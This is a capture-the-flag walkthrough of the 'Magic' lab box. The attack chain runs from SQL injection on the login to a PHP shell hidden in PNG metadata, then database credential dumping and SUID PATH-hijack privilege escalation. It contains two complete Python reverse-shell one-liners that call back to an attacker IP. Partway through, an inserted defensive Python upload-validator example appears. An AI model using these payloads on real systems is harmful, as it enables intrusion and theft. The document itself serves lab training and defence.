Magic
Magic is a box running a web server. We will use SQL injection to bypass the login screen and upload a PHP shell with a modified magic byte to bypass the upload filter. With basic access we will then find a database file that contains hard-coded database credentials. We will then dump the database to get the admin username and password, which we can use to escalate privileges and get the user flag.
In order to get root, we find a sysinfo binary with the SUID bit set, which we will use to run a malicious fdisk file that executes a reverse shell via Python, getting us root access.
Use nmap to scan the Magic host for all ports using:
-sC to scan with default scripts.
-sV to scan for service versions.
-p0-65536 to scan all ports (using -p- misses port 0, which MAY be used in rare cases).
We see port 80 is open, so let's recon the site: http://10.10.10.185
The homepage contains a picture gallery with id tags. We also see a link to a Login page: http://10.10.10.185/login.php
Since the site states “Please Login, to upload images”, let's note that we may need to upload a file to get an initial foothold.
Using Burp Proxy, let's send a POST request with the following parameters to the login page:
Username/Password: admin/password
Let's modify the input to contain a MySQL payload to bypass the login screen:
We are routed to an upload page. If you click Upload Image, it tells you that it only accepts jpg, jpeg, and png.
NOTE: You will need an image. Replace “test” with the name of your file. I use my dgb1.png.
Let's modify a png with exiftool and add a php shell with a cmd parameter:
To bypass the file type filter, let's rename this to .php.png so it is handled as php:
Upload the file.
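As an added defensive example (not from the original writeup), the Python validator below shows the kind of weak extension-and-magic-bytes filter that a .php.png file with PHP in its image metadata passes, beside a stricter check that rejects it; the file names and byte samples are constructed.

```python
import os
import re
from typing import Optional

# Signatures for the three types the upload page accepts (jpg, jpeg, png).
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
ALLOWED = {".png": PNG_MAGIC, ".jpg": JPEG_MAGIC, ".jpeg": JPEG_MAGIC}
# One base name, one extension: 'test.php.png' does not match, 'dgb1.png' does.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(png|jpe?g)$", re.IGNORECASE)

# Constructed samples: a PNG header followed by a fake text chunk, one of
# them carrying a PHP open tag the way exiftool-injected metadata would.
CLEAN_PNG = PNG_MAGIC + b"tEXtComment\x00just a picture"
PHP_IN_PNG = PNG_MAGIC + b"tEXtComment\x00<?php /* constructed marker */ ?>"


def weak_check(filename: str, data: bytes) -> bool:
    """The filter the writeup bypasses: an allowed extension appearing
    anywhere in the name plus a valid image header is enough."""
    ext_ok = any(ext in filename.lower() for ext in ALLOWED)
    magic_ok = any(data.startswith(sig) for sig in ALLOWED.values())
    return ext_ok and magic_ok


def strict_check(filename: str, data: bytes) -> Optional[str]:
    """Return None if the upload is accepted, otherwise the rejection reason."""
    base = os.path.basename(filename)
    if base != filename or not SAFE_NAME.match(base):
        return "bad filename"  # double extensions and path components rejected
    ext = os.path.splitext(base)[1].lower()
    if not data.startswith(ALLOWED[ext]):
        return "magic bytes do not match extension"
    # Heuristic: metadata chunks carrying a PHP tag are rejected outright.
    # Re-encoding the image server-side strips such chunks more reliably.
    if b"<?php" in data or b"<?=" in data:
        return "embedded PHP tag in image data"
    return None


def stored_name(ext: str) -> str:
    # Server-generated name, so the client never chooses the stored file name.
    return os.urandom(8).hex() + ext


if __name__ == "__main__":
    for name, blob in [("test.php.png", PHP_IN_PNG), ("dgb1.png", CLEAN_PNG)]:
        print(name, "weak:", weak_check(name, blob), "strict:", strict_check(name, blob))
```

Even with the stricter check, the uploads directory should be served with PHP execution disabled, since validation alone is the single point of failure this box demonstrates.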
Call the php shell by adding a parameter value to our hidden php file:
Now that we know we have shell execution, let's open a netcat session:
Use the following URL to create a system shell back to your machine. Use your own IP instead of the IP below:
http://10.10.10.185/images/uploads/test.php.png?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.209",7777)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now that you have a system shell in your netcat listener, use the following command to get a bash shell:
Within the webserver directory we find an interesting database file:
The file includes the hard-coded database username and password; let's use these to dump the database:
Now that we have the admin username and password, let's escalate to theseus's shell:
Let's route to theseus's home directory and get the user flag:
We will use the sysinfo/fdisk exploit to create a root bash shell.
On your machine, let's create a fdisk file:
Add the following to fdisk:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.209",7778));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Create a python webserver in the current directory:
Within the Magic bash shell, route to the tmp directory:
Use wget to pull our fdisk file:
Let's add the tmp directory to PATH and change the privileges on fdisk:
Open a netcat listener on your machine:
Use the sysinfo command on the Magic machine:
Once you get a system bash, run the python command below to get a bash shell:
You now have root! Route to the root directory to get the root flag:
That’s it!
An alternative way to get the database username and password is using sqlmap.